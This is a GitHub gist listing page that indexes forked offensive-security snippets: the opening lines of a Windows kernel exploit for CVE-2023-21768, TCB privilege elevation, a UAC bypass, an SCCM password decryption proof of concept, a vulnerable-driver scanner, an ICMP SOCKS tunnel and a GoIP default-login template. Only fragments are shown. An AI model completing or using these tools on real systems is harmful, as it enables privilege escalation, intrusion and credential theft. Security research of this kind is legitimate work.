Skip to content

Instantly share code, notes, and snippets.

View killvxk's full-sized avatar
:shipit:
Focusing

killvxk

:shipit:
Focusing
1.4k followers · 7.1k following
  • USSR
View GitHub Profile
@killvxk
killvxk / proxyconf.sh
Created November 17, 2023 16:51 — forked from dadevel/README.md
Proxychains Quick Config
set-proxy() {
case "$#" in
1)
declare -r protocol=socks5
declare -r host=127.0.0.1
declare -r port="$1"
;;
2)
declare -r protocol="$1"
declare -r host=127.0.0.1
@killvxk
killvxk / Exploit.c
Created November 16, 2023 05:07 — forked from D4m0n/Exploit.c
The Exploit PoC of CVE-2023-21768
#include "exploit.h"
#define AFD_NOTIFYSOCK_IOCTL 0x12127
typedef struct AFD_NOTIFYSOCK_DATA
{
HANDLE hIoCompletionPort; // 0x0
PVOID registrationInfos; // 0x8
PVOID completionPortEntries; // 0x10
PVOID receivedEntryCount; // 0x18 AAW target
@killvxk
killvxk / AltPidFinder.cpp
Created September 15, 2023 09:35 — forked from antonioCoco/AltPidFinder.cpp
#include "Windows.h"
#include "stdio.h"
#include "strsafe.h"
#include "winternl.h"
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION
{
ULONG NumberOfProcessIdsInList;
@killvxk
killvxk / TcbElevation.cpp
Created September 15, 2023 09:35 — forked from antonioCoco/TcbElevation.cpp
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
@killvxk
killvxk / TaskManagerSecret.c
Created September 15, 2023 09:35 — forked from antonioCoco/TaskManagerSecret.c
/*
TaskManagerSecret
Author: @splinter_code
This is a very ugly POC for a very unreliable UAC bypass through some UI hacks.
The core of this hack is stealing and using a token containing the UIAccess flag set.
A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
From there it uses a task manager "feature" to run a new High IL cmd.exe.
This has been developed only for fun and shouldn't be used due to its high unreliability.
@killvxk
killvxk / drvscan.cpp
Created April 28, 2023 10:44 — forked from adrianyy/drvscan.cpp
vulnerable driver scanner
#include <string>
#include <vector>
#include <fstream>
#include <iostream>
#include <filesystem>
#include <Windows.h>
#include <winternl.h>
static_assert( sizeof( void* ) == 8 );
@killvxk
killvxk / Entry.c
Created April 10, 2023 13:43 — forked from realoriginal/Entry.c
TLDR: How a socks proxy client is written to tunnel connections from a 'teamserver' to an agent.
/*!
*
* RPROXICMP
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation Team
*
!*/
@killvxk
killvxk / goip-default-login.yaml
Created February 2, 2023 07:34 — forked from drfabiocastro/goip-default-login.yaml
GoIP GSM VoIP Gateway Default Password
id: goip-default-login
info:
name: GoIP GSM VoIP Gateway Default Password
author: drfabiocastro
severity: high
description: GoIP GSM VoIP Gateway Default Password, Allows attackers to send, receive sms and calls.
reference:
- http://en.dbltek.com/
- https://medium.com/@hackatnow/how-to-create-a-python-script-to-find-goip-gsm-gateway-on-shodan-and-send-sms-ussd-via-goip-e2e203f5d339
@killvxk
killvxk / Building_v8_Windows.md
Created October 9, 2022 08:45 — forked from jhalon/Building_v8_Windows.md
@killvxk
killvxk / sccmdecryptpoc.cs
Created July 8, 2022 08:11 — forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
internal class Program